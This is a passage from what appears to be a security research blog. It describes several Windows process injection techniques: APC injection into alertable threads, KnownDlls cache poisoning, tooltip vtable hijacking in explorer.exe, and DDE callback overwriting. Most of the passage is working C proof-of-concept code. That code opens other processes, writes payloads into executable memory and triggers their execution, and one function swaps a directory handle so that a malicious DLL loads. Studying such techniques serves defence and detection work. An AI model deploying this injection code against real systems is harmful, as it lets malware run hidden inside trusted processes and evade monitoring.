    m      = GetModuleHandle(L"kernel32.dll");
    sevt   = GetProcAddress(m, "SetEvent");
    
    // for each alertable function
    for(i=0; i<6; i++) {
      // read the thread context
      c.ContextFlags = CONTEXT_CONTROL;
      GetThreadContext(ht, &c);
      // save address
      f[i] = (LPVOID)c.Rip;
      // queue SetEvent for next function
      QueueUserAPC(sevt, ht, (ULONG_PTR)evt);
    }
    // cleanup thread
    CloseHandle(ht);
    CloseHandle(evt[0]);
    CloseHandle(evt[1]);
#endif

    // Create a snapshot of threads
    ss = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if(ss == INVALID_HANDLE_VALUE) return NULL;
    
    // check each thread
    te.dwSize = sizeof(THREADENTRY32);
    
    if(Thread32First(ss, &te)) {
      do {
        // if not our target process, skip it
        if(te.th32OwnerProcessID != pid) continue;
        
        // if we can't open thread, skip it
        ht = OpenThread(
          THREAD_ALL_ACCESS, 
          FALSE, 
          te.th32ThreadID);
          
        if(ht == NULL) continue;
        
        // found alertable thread?
        if(IsAlertable(hp, ht, f)) {
          // save handle and exit loop
          h = ht;
          break;
        }
        // else close it and continue
        CloseHandle(ht);
      } while(Thread32Next(ss, &te));
    }
    // close snap shot
    CloseHandle(ss);
    return h;
}

Conclusion

Although both methods work fine, the first has some advantages. Different CPU modes/architectures (x86, AMD64, ARM64) and calling conventions (__msfastcall/__stdcall) require different ways to examine parameters. Microsoft may change how the system call wrapper functions work and therefore hardcoded offsets may point to the wrong address. The compiled code in future builds may decide to use another non-volatile register to hold the alertable parameter. e.g RBX, RDI or RBP.

Injection

After the difficult part of detecting alertable threads, the rest is fairly straight forward. The two main functions used for APC injection are:

The second is undocumented and therefore used by some threat actors to bypass API monitoring tools. Since KiUserApcDispatcher is used for APC routines, one might consider invoking it instead. The prototypes are:

NTSTATUS NtQueueApcThread(
  IN  HANDLE ThreadHandle,
  IN  PVOID ApcRoutine,
  IN  PVOID ApcRoutineContext OPTIONAL,
  IN  PVOID ApcStatusBlock OPTIONAL,
  IN  ULONG ApcReserved OPTIONAL);

VOID KiUserApcDispatcher(
  IN  PCONTEXT Context,
  IN  PVOID ApcContext,
  IN  PVOID Argument1,
  IN  PVOID Argument2,
  IN  PKNORMAL_ROUTINE ApcRoutine)

For this post, only QueueUserAPC is used.

VOID apc_inject(DWORD pid, LPVOID payload, DWORD payloadSize) {
    HANDLE hp, ht;
    SIZE_T wr;
    LPVOID cs;
    
    // 1. Open target process
    hp = OpenProcess(
      PROCESS_DUP_HANDLE | 
      PROCESS_VM_READ    | 
      PROCESS_VM_WRITE   | 
      PROCESS_VM_OPERATION, 
      FALSE, pid);
      
    if(hp == NULL) return;
    
    // 2. Find an alertable thread
    ht = find_alertable_thread1(hp, pid);

    if(ht != NULL) {
      // 3. Allocate memory
      cs = VirtualAllocEx(
        hp, 
        NULL, 
        payloadSize, 
        MEM_COMMIT | MEM_RESERVE, 
        PAGE_EXECUTE_READWRITE);
        
      if(cs != NULL) {
        // 4. Write code to memory
        if(WriteProcessMemory(
          hp, 
          cs, 
          payload, 
          payloadSize, 
          &wr)) 
        {
          // 5. Run code
          QueueUserAPC(cs, ht, 0);
        } else {
          printf("unable to write payload to process.\n");
        }
        // 6. Free memory
        VirtualFreeEx(
          hp, 
          cs, 
          0, 
          MEM_DECOMMIT | MEM_RELEASE);
      } else {
        printf("unable to allocate memory.\n");
      }
    } else {
      printf("unable to find alertable thread.\n");
    }
    // 7. Close process
    CloseHandle(hp);
}

PoC here

Posted in assembly, injection, malware, process injection, programming, shellcode, windows | Tagged , , , | Leave a comment

Windows Process Injection: KnownDlls Cache Poisoning

Introduction

This is a quick post in response to a method of injection described by James Forshaw in Bypassing CIG Through KnownDlls. The first example of poisoning the KnownDlls cache on Windows can be sourced back to a security advisory CVE-1999-0376 or MS99-066 published in February 1999. That vulnerability was discovered by Christien Rioux from the hacker group, L0pht. The PoC he released to demonstrate the attack became the basis for other projects involving DLL injection and function hooking. For example, Injection into a Process Using KnownDlls published in 2012 is heavily based on dildog’s original source code. What’s interesting about the injection method described by James is that it doesn’t read or write to virtual memory, something that’s required for almost every method of process injection known. It works by replacing a directory handle in a target process which is then used by the DLL loader to load a malicious DLL. Very clever! 🙂 Other posts related to this topic also worth reading:

If you want a closer look at the Windows Object Manager, WinObj from Microsoft is useful as is NtObjectManager.

Figure 1. KnownDlls in WinObj

Obtaining KnownDlls Directory Object Handle

As James points out, there are at least two ways to do this.

Method 1

The handle is stored in a global variable called ntdll!LdrpKnownDllDirectoryHandle (shown in figure 2) and can be found by searching the .data segment of NTDLL. Once the address is found, one can read the existing handle or overwrite it with a new one.

Figure 2. ntdll!LdrpKnownDllDirectoryHandle

The following code implements this method. The base address is constant for each process and therefore not necessary to read from a remote process.

LPVOID GetKnownDllHandle(DWORD pid) {
    LPVOID                   m, va = NULL;
    PIMAGE_DOS_HEADER        dos;
    PIMAGE_NT_HEADERS        nt;
    PIMAGE_SECTION_HEADER    sh;
    DWORD                    i, cnt;
    PULONG_PTR               ds;
    BYTE                     buf[1024];
    POBJECT_NAME_INFORMATION n = (POBJECT_NAME_INFORMATION)buf;

    // get base of NTDLL and pointer to section header
    m   = GetModuleHandle(L"ntdll.dll");
    dos = (PIMAGE_DOS_HEADER)m;  
    nt  = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);  
    sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
          nt->FileHeader.SizeOfOptionalHeader);
          
    // locate the .data segment, save VA and number of pointers
    for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
      if(*(PDWORD)sh[i].Name == *(PDWORD)".data") {
        ds  = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
        cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
        break;
      }
    }
    // for each pointer
    for(i=0; i<cnt; i++) {
      if((LPVOID)ds[i] == NULL) continue;
      // query the object name
      NtQueryObject((LPVOID)ds[i], 
        ObjectNameInformation, n, MAX_PATH, NULL);
            
      // string returned?
      if(n->Name.Length != 0) {
        // does it match ours?
        if(!lstrcmp(n->Name.Buffer, L"\\KnownDlls")) {
          // return virtual address
          va = &ds[i];
          break;
        }
      }
    }
    return va;
}

Method 2

The SystemHandleInformation class passed to NtQuerySystemInformation will return a list of all handles open on the system. To target a speicific process, we compare the UniqueProcessId from each SYSTEM_HANDLE_TABLE_ENTRY_INFO structure with the target PID. The HandleValue is duplicated and the name is queried. This name is then compared with “\KnownDlls” and if a match is found, HandleValue is returned to the caller.

HANDLE GetKnownDllHandle2(DWORD pid, HANDLE hp) {
    ULONG                      len;
    NTSTATUS                   nts;
    LPVOID                     list=NULL;    
    DWORD                      i;
    HANDLE                     obj, h = NULL;
    PSYSTEM_HANDLE_INFORMATION hl;
    BYTE                       buf[1024];
    POBJECT_NAME_INFORMATION   name = (POBJECT_NAME_INFORMATION)buf;
    
    // read the full list of system handles
    for(len = 8192; ;len += 8192) {
      list = malloc(len);
      
      nts = NtQuerySystemInformation(
          SystemHandleInformation, list, len, NULL);
      
      // break from loop if ok    
      if(NT_SUCCESS(nts)) break;
      
      // free list and continue
      free(list);
    }
    
    hl = (PSYSTEM_HANDLE_INFORMATION)list;

    // for each handle
    for(i=0; i<hl->NumberOfHandles && h == NULL; i++) {
      // skip these to avoid hanging process
      if((hl->Handles[i].GrantedAccess == 0x0012019f) || 
         (hl->Handles[i].GrantedAccess == 0x001a019f) || 
         (hl->Handles[i].GrantedAccess == 0x00120189) || 
         (hl->Handles[i].GrantedAccess == 0x00100000)) {
        continue;
      }

      // skip if this handle not in our target process
      if(hl->Handles[i].UniqueProcessId != pid) {
        continue;
      }
      
      // duplicate the handle object
      nts = NtDuplicateObject(
            hp, (HANDLE)hl->Handles[i].HandleValue, 
            GetCurrentProcess(), &obj, 0, FALSE, 
            DUPLICATE_SAME_ACCESS);
        
      if(NT_SUCCESS(nts)) {
        // query the name
        NtQueryObject(
          obj, ObjectNameInformation, 
          name, MAX_PATH, NULL);
          
        // if name returned.. 
        if(name->Name.Length != 0) {
          // is it knowndlls directory?
          if(!lstrcmp(name->Name.Buffer, L"\\KnownDlls")) {
            h = (HANDLE)hl->Handles[i].HandleValue;
          }
        }
        NtClose(obj);
      }
    }
    free(list);
    return h;
}

Injection

The following code is purely based on the steps described in the article and in its current state will cause a target process to stop working properly. That’s why the PoC creates a process (notepad) before attempting injection rather than allowing selection of a process.

VOID knowndll_inject(DWORD pid, PWCHAR fake_dll, PWCHAR target_dll) {
    NTSTATUS          nts;
    DWORD             i;
    HANDLE            hp, hs, hf, dir, target_handle;
    OBJECT_ATTRIBUTES fa, da, sa;
    UNICODE_STRING    fn, dn, sn, ntpath;
    IO_STATUS_BLOCK   iosb;

    // open process for duplicating handle, suspending/resuming process
    hp = OpenProcess(PROCESS_DUP_HANDLE | PROCESS_SUSPEND_RESUME, FALSE, pid);
    
    // 1. Get the KnownDlls directory object handle from remote process
    target_handle = GetKnownDllHandle2(pid, hp);

    // 2. Create empty object directory, insert named section of DLL to hijack
    //    using file handle of DLL to inject    
    InitializeObjectAttributes(&da, NULL, 0, NULL, NULL);
    nts = NtCreateDirectoryObject(&dir, DIRECTORY_ALL_ACCESS, &da);
    
    // 2.1 open the fake DLL
    RtlDosPathNameToNtPathName_U(fake_dll, &fn, NULL, NULL);
    InitializeObjectAttributes(&fa, &fn, OBJ_CASE_INSENSITIVE, NULL, NULL);
      
    nts = NtOpenFile(
      &hf, FILE_GENERIC_READ | FILE_GENERIC_WRITE | FILE_GENERIC_EXECUTE,
      &fa, &iosb, FILE_SHARE_READ | FILE_SHARE_WRITE, 0);
    
    // 2.2 create named section of target DLL using fake DLL image
    RtlInitUnicodeString(&sn, target_dll);
    InitializeObjectAttributes(&sa, &sn, OBJ_CASE_INSENSITIVE, dir, NULL);
        
    nts = NtCreateSection(
      &hs, SECTION_ALL_ACCESS, &sa, 
      NULL, PAGE_EXECUTE, SEC_IMAGE, hf);
            
    // 3. Close the known DLLs handle in remote process
    NtSuspendProcess(hp);
    
    DuplicateHandle(hp, target_handle, 
      GetCurrentProcess(), NULL, 0, TRUE, DUPLICATE_CLOSE_SOURCE);
                    
    // 4. Duplicate object directory for remote process
    DuplicateHandle(
        GetCurrentProcess(), dir, hp, 
        NULL, 0, TRUE, DUPLICATE_SAME_ACCESS);
        
    NtResumeProcess(hp);
    CloseHandle(hp);
    
    printf("Select File->Open to load \"%ws\" into notepad.\n", fake_dll);
    printf("Press any key to continue...\n");
    getchar();
}

Demo

Figure 3 shows a message box displayed after the hijacked DLL (ole32.dll) is loaded.

Figure 3. Injection in notepad.

PoC here.

Posted in injection, programming, windows | Tagged , , , | Leave a comment

Windows Process Injection: Tooltip or Common Controls

Introduction

Tooltips appear automatically to a mouse pointer hovering over an element in a user interface. This helps users identify the purpose of a file, a button or menu item. These tooltips store data about itself in a structure located at index zero of the Window Bytes. The first entry in the structure is a pointer to a class object called CToolTipsMgr. There are at least five methods here, three for the IUnknown interface which CToolTipsMgr inherits from and two to control the tooltip object itself. By changing the address of a method/function pointer, it’s possible to perform process injection via a window message.

Locating Controls

Figure 1 shows the properties of a tooltip control window.

Figure 1. Window properties for tooltip class.

As you can see, index zero of the window bytes are set to a value. This is a heap object that contains among other things, a pointer to a class object or virtual function table at offset zero. Figure 2 shows a partial dump of the memory in Windows Debugger while figure 3 shows the methods of the class used to control the window.

Figure 2. Heap object for window.

Figure 3. Methods of tool tip control window.

The PoC doesn’t target any specific process, but since explorer.exe will likely be the first to create a Tooltip control, it’s relatively safe to assume a window belonging to that process will be returned by a call to the FindWindow API for classes named “tooltips_class32”. You could also use the EnumWindows API to find them all and target a specific process. Figure 4 shows a list of these classes found on a 64-bit version of Windows 10.

Figure 4. List of tooltip windows found via EnumWindows.

Injection

The following code demonstrates the injection works. The full version can be found here.

VOID comctrl_inject(LPVOID payload, DWORD payloadSize) {
    HWND         hw = 0;
    SIZE_T       rd, wr;
    LPVOID       ds, cs, p, ptr;
    HANDLE       hp;
    DWORD        pid;
    IUnknown_VFT unk;
    
    // 1. find a tool tip window.
    //    read index zero of window bytes
    hw = FindWindow(L"tooltips_class32", NULL);
    p  = (LPVOID)GetWindowLongPtr(hw, 0);
    GetWindowThreadProcessId(hw, &pid);
    
    // 2. open the process and read CToolTipsMgr
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if(hp == NULL) return;
    ReadProcessMemory(hp, p, &ptr, sizeof(ULONG_PTR), &rd);
    ReadProcessMemory(hp, ptr, &unk, sizeof(unk), &rd);
    
    //printf("HWND : %p Heap : %p PID : %i vftable : %p\n", 
      // hw, p, pid, ptr);
    
    // 3. allocate RWX memory and write payload there.
    //    update callback
    cs = VirtualAllocEx(hp, NULL, payloadSize, 
      MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 4. allocate RW memory and write new CToolTipsMgr
    unk.AddRef = cs;
    ds = VirtualAllocEx(hp, NULL, sizeof(unk),
      MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(hp, ds, &unk, sizeof(unk), &wr);
    
    // 5. update pointer, trigger execution
    WriteProcessMemory(hp, p, &ds, sizeof(ULONG_PTR), &wr);
    PostMessage(hw, WM_USER, 0, 0);

    // sleep for moment
    Sleep(1);
    
    // 6. restore original pointer and cleanup
    WriteProcessMemory(hp, p, &ptr, sizeof(ULONG_PTR), &wr);    
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Summary

The PoC only works with Tooltip class, but there are other controls that can also be used for process injection. Tab controls, progress bars, status bars, tree views, toolbars, list views are just some other examples. The reason tooltips were used in this post is because many of them are already created by explorer.exe.

Posted in injection, process injection, programming, security, windows | Tagged , , | Leave a comment

Windows Process Injection: Breaking BaDDEr

Introduction

Dynamic Data Exchange (DDE) is a data sharing protocol while the Dynamic Data Exchange Management Library (DDEML) facilitates sharing of data among applications over the DDE protocol. DDE made the headlines in October 2017 after a vulnerability was discovered in Microsoft Office that could be exploited to execute code. Since then, it’s been disabled by default and is therefore not considered a critical component. The scope of this injection method is limited to explorer.exe, unless of course you know of other applications that use it. I’d like to thank Adam for the discussion about using DDE for injection and also the cheesy name. 😀

Enumerating DDE Servers

The only DLL that use DDE servers on Windows 10 are shell32.dll, ieframe.dll and twain_32.dll. shell32.dll creates three DDE servers that are hosted by explorer.exe. The following code uses DDEML API to list servers and the process hosting them.

VOID dde_list(VOID) {
    CONVCONTEXT cc;
    HCONVLIST   cl;
    DWORD       idInst = 0;
    HCONV       c = NULL;
    CONVINFO    ci;
    WCHAR       server[MAX_PATH];
    
    if(DMLERR_NO_ERROR != DdeInitialize(&idInst, NULL, APPCLASS_STANDARD, 0)) {
      printf("unable to initialize : %i.\n", GetLastError());
      return;
    }
    
    ZeroMemory(&cc, sizeof(cc));
    cc.cb = sizeof(cc);
    cl = DdeConnectList(idInst, 0, 0, 0, &cc);
    
    if(cl != NULL) {
      for(;;) {
        c = DdeQueryNextServer(cl, c);
        if(c == NULL) break;
        ci.cb = sizeof(ci);
        DdeQueryConvInfo(c, QID_SYNC, &ci);
        DdeQueryString(idInst, ci.hszSvcPartner, server, MAX_PATH, CP_WINUNICODE);
        
        printf("Service : %-10ws Process : %ws\n", 
          server, wnd2proc(ci.hwndPartner));
      }
      DdeDisconnectList(cl);
    } else {
      printf("DdeConnectList : %x\n", DdeGetLastError(idInst));
    }
    DdeUninitialize(idInst);
}

DDE Internals

Figure 1 shows the decompiled code where the servers are created.

Figure 1. DDE initialization in shell32.dll

user32!DdeInitializeW is where all the interesting stuff occurs. user32!InternalDdeInitialize will allocate memory on the heap for a structure called CL_INSTANCE_INFO which isn’t documented in the public SDK, but you can still find it online.

typedef struct tagCL_INSTANCE_INFO {
    struct tagCL_INSTANCE_INFO *next;
    HANDLE                      hInstServer;
    HANDLE                      hInstClient;
    DWORD                       MonitorFlags;
    HWND                        hwndMother;
    HWND                        hwndEvent;
    HWND                        hwndTimeout;
    DWORD                       afCmd;
    PFNCALLBACK                 pfnCallback;
    DWORD                       LastError;
    DWORD                       tid;
    LATOM                      *plaNameService;
    WORD                        cNameServiceAlloc;
    PSERVER_LOOKUP              aServerLookup;
    short                       cServerLookupAlloc;
    WORD                        ConvStartupState;
    WORD                        flags;              // IIF_ flags
    short                       cInDDEMLCallback;
    PLINK_COUNT                 pLinkCount;
} CL_INSTANCE_INFO, *PCL_INSTANCE_INFO;

The only field we’re interested in is pfnCallback. The steps to inject are:

  1. Find the DDE mother window by its registered class name “DDEMLMom”.
  2. Read the address of CL_INSTANCE_INFO using GetWindowLongPtr.
  3. Allocate RWX memory in remote process and write payload there.
  4. Overwrite the function pointer pfncallback with the remote address of payload.
  5. Trigger execution over DDE.

Figure 2 shows the properties of the mother window. As you can see, index zero of the Window Bytes is set. This is the address of CL_INSTANCE_INFO.

Figure 2. Mother Window for DDE server.

Injection

The following is a PoC to demonstrate the method works. Full source can be found here.

VOID dde_inject(LPVOID payload, DWORD payloadSize) {
    HWND             hw;
    SIZE_T           rd, wr;
    LPVOID           ptr, cs;
    HANDLE           hp;
    CL_INSTANCE_INFO pcii;
    CONVCONTEXT      cc;
    HCONVLIST        cl;
    DWORD            pid, idInst = 0;
    
    // 1. find a DDEML window and read the address 
    //    of CL_INSTANCE_INFO
    hw = FindWindowEx(NULL, NULL, L"DDEMLMom", NULL);
    if(hw == NULL) return;
    ptr = (LPVOID)GetWindowLongPtr(hw, GWLP_INSTANCE_INFO);
    if(ptr == NULL) return;
      
    // 2. open the process and read CL_INSTANCE_INFO
    GetWindowThreadProcessId(hw, &pid);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if(hp == NULL) return;
    ReadProcessMemory(hp, ptr, &pcii, sizeof(pcii), &rd);
    
    // 3. allocate RWX memory and write payload there.
    //    update callback
    cs = VirtualAllocEx(hp, NULL, payloadSize, 
      MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    WriteProcessMemory(
      hp, (PBYTE)ptr + offsetof(CL_INSTANCE_INFO, pfnCallback), 
      &cs, sizeof(ULONG_PTR), &wr);
            
    // 4. trigger execution via DDE protocol
    DdeInitialize(&idInst, NULL, APPCLASS_STANDARD, 0);
    ZeroMemory(&cc, sizeof(cc));
    cc.cb = sizeof(cc);
    cl = DdeConnectList(idInst, 0, 0, 0, &cc);
    DdeDisconnectList(cl);
    DdeUninitialize(idInst);
    
    // 5. restore original pointer and cleanup
    WriteProcessMemory(
      hp, 
      (PBYTE)ptr + offsetof(CL_INSTANCE_INFO, pfnCallback), 
      &pcii.pfnCallback, sizeof(ULONG_PTR), &wr);
          
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}
Posted in injection, malware, process injection, programming, windows | Tagged , , , , | Leave a comment